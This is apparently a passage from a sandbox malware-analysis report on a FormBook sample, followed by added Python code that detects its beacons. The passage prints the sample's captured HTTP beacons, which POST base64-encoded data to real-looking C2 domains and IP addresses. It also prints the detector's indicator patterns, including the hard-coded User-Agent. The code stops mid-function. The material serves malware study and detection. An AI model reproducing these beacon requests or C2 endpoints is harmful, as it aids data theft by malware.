                                                          Data Raw: 31 64 66 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 7d 6b 73 e3 36 b2 e8 67 fb 57 60 38 35 1e 71 87 a4 48 ea 61 59 b6 9c ca 71 b2 f7 e4 56 66 27 35 33 39 5b a7 c6 29 17 44 42 12 6c 92 60 00 d0 b2 af d7 ff fd 56 03 7c 4a d4 c3 8f c9 d9 e3 64 24 11 68 74 37 1a fd c0 9b 67 6f 7e fa 74 f1 f5 bf 7f fb 19 2d 64 1c 9d 1f 9e c1 17 8a 70 32 9f 18 24 b1 7f ff 62 40 1a c1 e1 f9 e1 c1 59 4c 24 46 c1 02 73 41 e4 c4 f8 fd eb df ed 91 51 a6 27 38 26 13 e3 96 92 65 ca b8 34 50 c0 12 49 12 39 31 96 34 94 8b 49 48 6e 69 40 6c f5 60 21 9a 50 49 71 64 8b 00 47 64 e2 29 2c 11 4d 6e 10 27 d1 c4 48 39 9b d1 88 18 68 c1 c9 6c 62 2c a4 4c c7 dd ee 3c 4e e7 0e e3 f3 ee dd 2c e9 7a 50 e6 f0 e0 4c 52 19 91 f3 df f0 9c a0 84 49 34 63 59 12 a2 a3 b7 23 df f3 4e 11 e6 72 96 45 b3 4c 50 96 2c b2 a9 13 61 79 d6 d5 25 0e 6b 4c bf e7 6c ca a4 78 5f b2 fc 3e c6 77 36 8d f1 9c d8 29 27 50 a5 71 84 f9 9c bc 47 dd f3 c3 8a cf f7 61 22 00 60 46 64 b0 78 af 99 7d df ed ce 58 22 85 33 67 6c 1e 11 9c 52 e1 04 2c ae 95 d4 60 50 27 31 2e 81 85 [TRUNCATED]
                                                          Data Ascii: 1dfe}ks6gW`85qHaYqVf'539[)DBl`V|Jd$ht7go~t-dp2$b@YL$FsAQ'8&e4PI914IHni@l`!PIqdGd),Mn'H9hlb,L<N,zPLRI4cY#NrELP,ay%kLlx_>w6)'PqGa"`Fdx}X"3glR,`P'1.2L&LIrGKb y4%].82h:wg]{qq$RN%NSs"^[S
                                                          Jul 26, 2024 18:47:09.167099953 CEST1236INData Raw: d0 d9 9b 6f 17 3f fd f8 f5 c7 6f e8 6f dd c3 25 4d 42 b6 74 ae 96 29 89 d9 35 fd 42 a4 a4 c9 5c a0 09 7a 30 a6 58 90 df 79 64 8c 73 26 2e bb 97 5d e1 2c 41 09 2f bb 4a 3f c4 65 37 60 9c 5c 76 55 e1 cb ae 37 70 5c a7 77 d9 3d f6 ef 8e fd cb ae 61
                                                          Data Ascii: o?oo%MBt)5B\z0Xyds&.],A/J?e7`\vU7p\w=aNcIav<|vUYb%X.Ie!*A9i\nA_T NDd$cIBYj%-Y"E::|^Rp_bL,Ic"$q'!K
                                                          Jul 26, 2024 18:47:09.167110920 CEST1236INData Raw: 47 f0 c6 f7 93 37 9e 95 38 1c 7e 5e e0 28 9a e2 e0 a6 6e eb 75 40 f7 71 4d ac 55 5f a4 25 4b 29 6d 3b f3 ff fa 57 67 85 68 c7 b4 3a 04 6a a2 fa d4 ff fa d7 c3 a3 e9 d4 7a d5 3f 48 e8 9e 55 cf e6 98 38 f9 a0 e1 e8 88 38 72 99 ff ec 00 5c fe 04 9a
                                                          Data Ascii: G78~^(nu@qMU_%K)m;Wgh:jz?HU88r\RBhrX!2pabB9tZa#Nv$l@!{e<eejFB4c74DLdbCl1Hm1s\=^%\G6<#
                                                          Jul 26, 2024 18:47:09.168064117 CEST1236INData Raw: 8e d1 db 60 e6 13 9f b4 c3 45 59 4c 13 96 89 bc 00 e3 38 99 6b 1e 86 27 9b aa b5 52 06 c3 dc 29 14 09 a6 9b 8b 40 14 b0 e7 30 27 a9 a4 32 46 6f 8f a7 61 30 1d 6c e3 be 01 ee ba a1 3b ea 6f 11 4a 21 6c e0 7e 44 42 6f 16 6c c3 5d 87 76 87 27 3d d2
                                                          Data Ascii: `EYL8k'R)@0'2Foa0l;oJ!l~DBol]v'=f<d::@<Kv\Nv)k'QS.ox*982zTednw?|L7X#<}gn$zo|}FnI|wdy=w'u661F
                                                           Jul 26, 2024 18:47:09.168075085 CEST | 1236 | IN | Data Raw: 9d 26 aa 16 5a c5 0a c4 8b a8 14 48 5a f0 ab 15 88 6a 56 ff a1 da e8 d2 82 71 75 e5 a2 8d 5f bd ae fe 74 84 ba 60 9b ee c0 8a c5 33 10 aa 72 2d f8 ee 9e 8d f1 ae 0d e7 e1 ff d4 c4 e9 e1 5f 33 2f 7c b8 61 c7 59 b9 93 d9 ac cb cf 53 33 f0 6a b3 52
                                                          Data Ascii: &ZHZjVqu_t`3r-_3/|aYS3jRyy@1u7HG4k ii"5d],::#C&,.p\9;)[Z6QTM|5Um=[*F=X)S{%Y{;MI`G
                                                           Jul 26, 2024 18:47:09.169152021 CEST | 1236 | IN | Data Raw: 05 5a c0 d5 9f 28 57 09 ca 12 3b 3f 58 8a 04 4d e6 91 1a fa cd a1 91 66 04 76 54 93 d0 16 11 05 85 d3 2b 98 22 50 d8 6b 63 23 b8 56 f6 f0 e0 2c a4 b7 4a 34 29 68 6c c1 39 48 5f 35 ce 19 2e 93 6e 68 6a 2b 9f 91 cf d0 71 ad ea 20 e0 c2 25 bc cd d5
                                                          Data Ascii: Z(W;?XMfvT+"Pkc#V,J4)hl9H_5.nhj+q %8rCS$Yag]Fc,$<6VCgh1ITk0S84$,6vgxW8n^|~M67J&If2i@](HUQl<+P
                                                           Jul 26, 2024 18:47:09.169162035 CEST | 776 | IN | Data Raw: a1 52 f5 f3 2f 2a bd 36 23 d3 74 90 da 69 60 35 d1 aa ca ea 3e f2 82 86 21 49 26 86 e4 19 51 2b 35 d5 7c 4e 2d ee 54 24 d7 e2 d8 ca e2 40 ee 23 0e 2b eb 54 b3 d6 f9 ac 6a c3 54 cb a9 d6 b5 2a d6 a7 f0 56 c3 56 89 a3 54 64 4e 72 7b 53 be 47 4f cc
                                                          Data Ascii: R/*6#ti`5>!I&Q+5|N-T$@#+TjT*VVTdNr{SGOIVmzdE46ndxtRRV.z*jMhajF+HUGje,,#!M6v{*VgZ3}osnKlT4@>z6c_bn4'h/Xz.EGKO}
                                                           Jul 26, 2024 18:47:09.169171095 CEST | 283 | IN | Data Raw: f7 0d b6 99 e5 77 da 16 d8 ba f3 f9 5a 74 ab f9 b5 c6 3e 40 d7 3b f6 7c 7f 98 ef 70 d1 bb d0 6b db 44 fe 72 36 cb 9d 22 f6 8c 05 99 b0 67 f4 6e 27 bf 2d 65 fe 7a c6 8b 6d db d0 33 f9 4f 75 12 6f 33 df c5 86 69 80 cd 8f ed 7d df dd dc fa ad b9 91
                                                          Data Ascii: wZt>@;|pkDr6"gn'-ezm3Ouo3i}z`-xoy|_fb,XwZpwPZ`*iW<5U?WCb1coBg2h85Y<pTr~q~vFY]KEY{MOhbG


                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                           16 | 192.168.2.5 | 55154 | 188.114.96.3 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                           Timestamp | Bytes transferred | Direction | Data
                                                           Jul 26, 2024 18:47:10.756584883 CEST | 473 | OUT | GET /qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.artfulfusionhub.lat
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                           Jul 26, 2024 18:47:12.013639927 CEST | 937 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 26 Jul 2024 16:47:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Location: https://artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP0
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3aOsu1%2BDw9TiYEw7Ao4cLqq2YmoGegVy1dqpSCbKBfsVd7S4ZfDCY%2FIjIWWPnpxqhdsMdQvB%2BYXL17yXfy2tK%2Bvio48gfmZebp56mpe6S%2BgwsyUNs9Kgw4YbWm7VFKI4rDnYY6dvI%2BKKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95debeaea48c18-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                           17 | 192.168.2.5 | 55155 | 154.218.3.243 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                           Timestamp | Bytes transferred | Direction | Data
                                                           Jul 26, 2024 18:47:17.141370058 CEST | 725 | OUT | POST /39t8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.9muyiutyt.online
                                                          Origin: http://www.9muyiutyt.online
                                                          Referer: http://www.9muyiutyt.online/39t8/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 78 2f 2f 31 41 4b 30 71 6c 4a 73 45 53 57 52 52 6a 6a 7a 6b 2b 48 52 30 61 31 70 37 2f 43 54 68 39 44 55 4e 2f 78 44 56 59 72 48 53 41 52 78 2f 4b 6b 67 6c 61 74 48 71 6d 6c 38 6b 62 4d 52 66 75 6c 76 6d 62 38 6a 72 52 58 39 76 42 52 71 46 48 61 5a 72 39 66 57 77 6c 4d 75 4b 37 54 36 56 4a 37 38 51 4e 37 6c 4f 2b 6a 52 38 77 6f 69 46 59 30 67 6c 33 37 49 32 61 5a 66 67 55 79 6b 78 57 4f 50 7a 53 2b 77 5a 33 43 68 70 63 38 6d 4b 67 66 6c 31 75 37 4f 41 37 56 52 6e 67 68 4e 76 6b 51 72 43 4a 74 4f 6a 67 4c 62 5a 4f 4f 58 47 6d 53 72 46 30 6b 79 76 34 57 4d 6b 54 79 50 44 52 2b 42 4f 34 74 45 3d
                                                          Data Ascii: 1Hg=x//1AK0qlJsESWRRjjzk+HR0a1p7/CTh9DUN/xDVYrHSARx/KkglatHqml8kbMRfulvmb8jrRX9vBRqFHaZr9fWwlMuK7T6VJ78QN7lO+jR8woiFY0gl37I2aZfgUykxWOPzS+wZ3Chpc8mKgfl1u7OA7VRnghNvkQrCJtOjgLbZOOXGmSrF0kyv4WMkTyPDR+BO4tE=
                                                           Jul 26, 2024 18:47:18.091609955 CEST | 432 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Fri, 26 Jul 2024 16:47:17 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.9muyiutyt.online/39t8/
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                           18 | 192.168.2.5 | 55156 | 154.218.3.243 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                           Timestamp | Bytes transferred | Direction | Data
                                                           Jul 26, 2024 18:47:19.727794886 CEST | 745 | OUT | POST /39t8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.9muyiutyt.online
                                                          Origin: http://www.9muyiutyt.online
                                                          Referer: http://www.9muyiutyt.online/39t8/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 78 2f 2f 31 41 4b 30 71 6c 4a 73 45 64 53 56 52 77 79 7a 6b 72 58 52 31 45 6c 70 37 30 69 54 6c 39 44 59 4e 2f 77 48 46 59 39 76 53 41 78 42 2f 4e 56 67 6c 4a 64 48 71 74 46 38 68 45 63 52 75 75 6c 6a 75 62 2b 6e 72 52 58 70 76 42 51 32 46 48 4a 78 6b 39 50 57 79 78 38 75 49 32 7a 36 56 4a 37 38 51 4e 37 68 6f 2b 6a 5a 38 77 59 79 46 61 51 4d 6b 39 62 49 31 4b 4a 66 67 65 69 6b 50 57 4f 50 61 53 2f 39 43 33 47 52 70 63 35 61 4b 67 4b 5a 32 33 72 4f 47 2f 56 51 57 76 7a 38 71 73 44 33 34 4a 64 47 72 2f 71 44 66 50 34 36 73 38 77 6a 74 6e 45 65 58 6f 46 45 54 43 43 75 71 4c 64 52 2b 6d 36 51 67 48 47 63 35 50 70 75 58 57 36 6e 77 63 6c 56 62 55 39 63 76
                                                          Data Ascii: 1Hg=x//1AK0qlJsEdSVRwyzkrXR1Elp70iTl9DYN/wHFY9vSAxB/NVglJdHqtF8hEcRuuljub+nrRXpvBQ2FHJxk9PWyx8uI2z6VJ78QN7ho+jZ8wYyFaQMk9bI1KJfgeikPWOPaS/9C3GRpc5aKgKZ23rOG/VQWvz8qsD34JdGr/qDfP46s8wjtnEeXoFETCCuqLdR+m6QgHGc5PpuXW6nwclVbU9cv
                                                           Jul 26, 2024 18:47:20.695777893 CEST | 432 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Fri, 26 Jul 2024 16:47:20 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.9muyiutyt.online/39t8/
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                           19 | 192.168.2.5 | 55157 | 154.218.3.243 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                           Timestamp | Bytes transferred | Direction | Data
                                                           Jul 26, 2024 18:47:22.308600903 CEST | 1762 | OUT | POST /39t8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.9muyiutyt.online
                                                          Origin: http://www.9muyiutyt.online
                                                          Referer: http://www.9muyiutyt.online/39t8/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 78 2f 2f 31 41 4b 30 71 6c 4a 73 45 64 53 56 52 77 79 7a 6b 72 58 52 31 45 6c 70 37 30 69 54 6c 39 44 59 4e 2f 77 48 46 59 39 58 53 41 43 4a 2f 4f 79 30 6c 59 74 48 71 6b 6c 38 67 45 63 52 7a 75 6c 37 69 62 2b 37 52 52 55 52 76 42 79 2b 46 51 49 78 6b 33 50 57 79 75 73 75 4e 37 54 37 42 4a 36 4d 55 4e 37 52 6f 2b 6a 5a 38 77 61 36 46 65 45 67 6b 37 62 49 32 61 5a 66 6b 55 79 6c 69 57 4f 58 67 53 2f 6f 33 30 31 5a 70 63 5a 71 4b 6e 38 4e 32 6f 37 4f 45 78 31 51 4f 76 7a 77 68 73 44 71 44 4a 65 62 77 2f 72 33 66 4f 4f 48 55 6c 43 54 75 6b 56 79 79 74 43 41 70 54 30 75 38 4d 37 70 57 72 4a 39 43 43 31 64 55 4e 76 61 73 53 59 2b 31 66 45 6f 4a 46 4c 6c 76 59 52 59 42 4f 53 36 61 50 41 44 52 7a 53 51 74 66 38 63 4a 46 48 6e 74 42 4b 33 6d 51 48 47 74 69 71 2b 51 68 49 55 57 63 49 68 62 58 65 57 38 47 73 30 7a 2b 37 6a 6e 61 72 43 49 75 6f 47 6c 63 4a 64 4f 69 45 36 57 74 6d 6d 6f 4d 7a 55 38 6c 73 47 72 6e 44 58 43 75 71 38 31 50 4d 58 70 47 6d 4b 61 31 64 31 31 39 46 53 78 70 64 74 7a 46 4e [TRUNCATED]
                                                          Data Ascii: 1Hg=x//1AK0qlJsEdSVRwyzkrXR1Elp70iTl9DYN/wHFY9XSACJ/Oy0lYtHqkl8gEcRzul7ib+7RRURvBy+FQIxk3PWyusuN7T7BJ6MUN7Ro+jZ8wa6FeEgk7bI2aZfkUyliWOXgS/o301ZpcZqKn8N2o7OEx1QOvzwhsDqDJebw/r3fOOHUlCTukVyytCApT0u8M7pWrJ9CC1dUNvasSY+1fEoJFLlvYRYBOS6aPADRzSQtf8cJFHntBK3mQHGtiq+QhIUWcIhbXeW8Gs0z+7jnarCIuoGlcJdOiE6WtmmoMzU8lsGrnDXCuq81PMXpGmKa1d119FSxpdtzFNqEeQOAlghGe9EvRGSf6WE464LHVvWFnpakrAiNLVG8G/ti0HvaTs6fbx0M0f6mt5rkJXV2X9gKQfmhjurDMx9oZtL1WWw1i5eKdLanqDbtBu7YV/gof7ydeVV47zA/dDEe9ISKh/gKjhCj7Da2IKSNC8shPNN/rEqlSe2nlYg8SEUkNK6En34kAj+398qPMdSMJh6AuVKjBTuEXWagileg7S0RqU52urpyjtXvP+yayrof94UrcY/U5OGlOAc/HKGRil8M9UDx7inxlN1NYFKOywLQ2X9p6icRyLTyR0t004y93K7jzhfz6bRhLp6NRaMXsQuzh0fLExoZKV6AbgfjLpaYiLVPqTS9do4sZNDA+JijsyWO/TOZWfcC6Xesjntb2cz2XV5Ggu0At3V6I7uWEIS0rWAuAcm/sW3bjHRH/vqYolEGS3sHlt/DNhB1xouPyUWwwfAwbvXU0/kPcFuM5O3cPtpSFhj31qc/Gjgh5DRnVQ1r6FM4wVHq0luYb7DZC5KkK3lFSozD/cj/zXCu39xyX+pUba8CK5bLtTDPKnMpbAFyf5iLdVKUF2Z5AIW68rcJvy005x/RPhdeeE52N2dxzXzVPXO5XkcRDwpS5iDul6eNuNgKa8xlCvLqFsH74CiWzNzIBmez+9n7qUc24TO6BONqdr8U [TRUNCATED]
                                                           Jul 26, 2024 18:47:23.454579115 CEST | 432 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Fri, 26 Jul 2024 16:47:23 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.9muyiutyt.online/39t8/
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                           20 | 192.168.2.5 | 55158 | 154.218.3.243 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                           Timestamp | Bytes transferred | Direction | Data
                                                           Jul 26, 2024 18:47:24.889914036 CEST | 470 | OUT | GET /39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.9muyiutyt.online
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                           Jul 26, 2024 18:47:25.866499901 CEST | 591 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Fri, 26 Jul 2024 16:47:25 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA==
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
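Sessions 16 to 20 above show the beacon shape this sample repeats against each of its domains: the same hard-coded Mac Chrome/44 User-Agent on every request, a four-character path (/qogc/, /39t8/), Connection: close, a form-urlencoded POST whose body is a single short key (1Hg) carrying raw base64 (note the unescaped '+', '/' and '=' in the body), Origin and Referer that are nothing more than the Host plus the path, and a closing GET that carries the same key in the query next to a short token (ejlto). None of the servers contacted answered with anything but a 301 to HTTPS or a 404, so this capture confirms the contact attempts rather than a live C2 exchange; that is a reason to detect on the request shape rather than on the response. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses raw HTTP requests, scores them against those indicators and returns the contacted hosts as network IOCs. The indicator names, the verdict rule (User-Agent match plus at least two structural hits, because the User-Agent alone is weak evidence) and the benign control request are the example's own choices, not a published FormBook signature; the two malicious inputs take their request line, Host, Origin, Referer, Content-Type, Connection and User-Agent verbatim from sessions 16 and 17, with the headers the checks do not read omitted.

```python
import base64
import re
from collections import namedtuple
from dataclasses import dataclass
from urllib.parse import urlsplit

# Hard-coded User-Agent seen on every request recorded in this report.
FORMBOOK_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36")
PATH_RE = re.compile(r"/[a-z0-9]{4}/")        # /qogc/, /39t8/, /1wd4/
KEY_RE = re.compile(r"[A-Za-z0-9]{3,5}")      # form/query key, here 1Hg
TOKEN_RE = re.compile(r"[A-Za-z0-9]{8,24}")   # short second query value (ejlto=...)
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
Request = namedtuple("Request", "method target headers body")

@dataclass
class Verdict:
    host: str
    path: str
    hits: list
    @property
    def is_beacon(self) -> bool:
        # User-Agent match plus at least two structural indicators (example's own rule).
        return "user-agent" in self.hits and len(self.hits) >= 3

def parse_request(raw: str) -> Request:
    """Split one raw HTTP/1.x request (CRLF or LF) into request line, headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()   # header names lower-cased
    return Request(method, target, headers, body)

def raw_params(qs: str) -> dict:
    """Split key=value pairs WITHOUT percent-decoding: the beacon's base64 carries raw
    '+', '/' and '=' that a normal form parser would turn into spaces or drop."""
    params = {}
    for pair in filter(None, qs.split("&")):
        key, _, value = pair.partition("=")
        params[key] = value
    return params

def b64_like(value: str, min_len: int = 40) -> bool:
    """Base64 alphabet, length a multiple of 4, decodes, and long enough to be a payload."""
    if len(value) < min_len or len(value) % 4 or not B64_RE.fullmatch(value):
        return False
    try:
        return bool(base64.b64decode(value, validate=True))
    except ValueError:          # binascii.Error is a ValueError
        return False

def assess(req: Request) -> Verdict:
    url, host = urlsplit(req.target), req.headers.get("host", "")
    origin = req.headers.get("origin")
    checks = [
        ("user-agent", req.headers.get("user-agent") == FORMBOOK_UA),
        ("short-path", bool(PATH_RE.fullmatch(url.path))),
        ("connection-close", req.headers.get("connection", "").lower() == "close"),
        ("origin-referer-from-host",
         origin == f"http://{host}" and req.headers.get("referer") == origin + url.path),
    ]
    hits = [name for name, ok in checks if ok]
    if req.method == "POST" and req.headers.get("content-type") == "application/x-www-form-urlencoded":
        fields = raw_params(req.body)
        if len(fields) == 1:
            key, value = next(iter(fields.items()))
            if KEY_RE.fullmatch(key) and b64_like(value):
                hits.append("single-b64-form-field")
    elif req.method == "GET":
        values = sorted(raw_params(url.query).values(), key=len)
        if len(values) == 2 and TOKEN_RE.fullmatch(values[0]) and b64_like(values[1]):
            hits.append("b64-blob-in-query")
    return Verdict(host, url.path, hits)

def beacon_hosts(verdicts) -> set:
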